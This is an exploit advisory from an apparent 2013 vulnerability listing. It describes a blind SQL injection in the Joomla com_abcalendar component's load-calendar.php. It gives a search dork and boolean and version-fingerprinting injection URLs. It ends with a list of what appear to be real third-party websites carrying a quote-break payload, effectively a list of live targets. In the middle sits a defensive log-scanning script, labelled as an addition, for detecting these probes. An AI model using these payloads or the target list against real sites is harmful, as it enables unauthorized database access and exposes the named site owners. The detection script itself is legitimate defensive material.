Joomla Component com_abcalendar Blind Injection Vulnerability

Author: AtT4CKxT3rR0r1ST
Risk: Security Risk Medium
0day-ID: 0day-ID-20894
Category: web applications
Date add: 15-06-2013
Platform: php
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST 
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Dork           : inurl:"com_abcalendar"
####################################################################
===[ Exploit ]===

SQL Injection:
==============

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3[Blind]

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=1 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=2 >> False

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=5 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=4 >> False
####################################################################
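
A defender's view of the requests listed above, as an added example that is not part of the original advisory: a log scan that flags non-numeric `cid` values sent to `load-calendar.php` and picks out sources whose boolean probes received different response sizes. The log lines, IP addresses, response sizes and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Jun/2013:10:00:01 +0000] "GET /administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 HTTP/1.1" 200 5120
203.0.113.9 - - [15/Jun/2013:10:02:11 +0000] "GET /administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [15/Jun/2013:10:02:12 +0000] "GET /administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3+and+1=2 HTTP/1.1" 200 812
203.0.113.9 - - [15/Jun/2013:10:02:15 +0000] "GET /administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3%20AND%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
192.0.2.44 - - [15/Jun/2013:10:05:00 +0000] "GET /administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3%27 HTTP/1.1" 200 640
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3} (\d+|-)')
TARGET = "/components/com_abcalendar/load-calendar.php"
RULES = [
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("version-fingerprint", re.compile(r"@@version|substring\s*\(", re.I)),
    ("quote-break", re.compile(r"['\"]")),
]

def classify_cid(cid):
    """Return the rule names a decoded cid value matches; [] for a plain integer."""
    if cid.isascii() and cid.isdigit():
        return []
    hits = [name for name, rx in RULES if rx.search(cid)]
    return hits or ["non-numeric"]

def scan(log_text):
    """Map client IP -> [(tags, decoded cid, response size)] for suspicious requests."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(TARGET):
            continue
        # parse_qs percent-decodes values and turns '+' into a space
        for cid in parse_qs(url.query, keep_blank_values=True).get("cid", []):
            tags = classify_cid(cid)
            if tags:
                findings[ip].append((tags, cid, size))
    return dict(findings)

def blind_probe_sources(findings):
    """IPs whose boolean probes got differing response sizes (the true/false oracle)."""
    return sorted(ip for ip, hits in findings.items()
                  if len({s for t, _, s in hits if "boolean-probe" in t}) > 1)
```

Since `cid` is expected to be an integer, any hit from `classify_cid` is worth reviewing; on the application side the same expectation is enforced by casting the value to an integer or binding it as a query parameter.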

http://www.puntamika.hr/portal/administrator/components/com_abcalendar/load-calendar.php?view=6&month=1&year=3190&cid=1'

www.christchurchapartments.co.uk/~christap/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2191&cid=3'

http://www.accommodationlagos.com/~accommod/administrator/components/com_abcalendar/load-calendar.php?view=3&month=8&year=5272&cid=3'
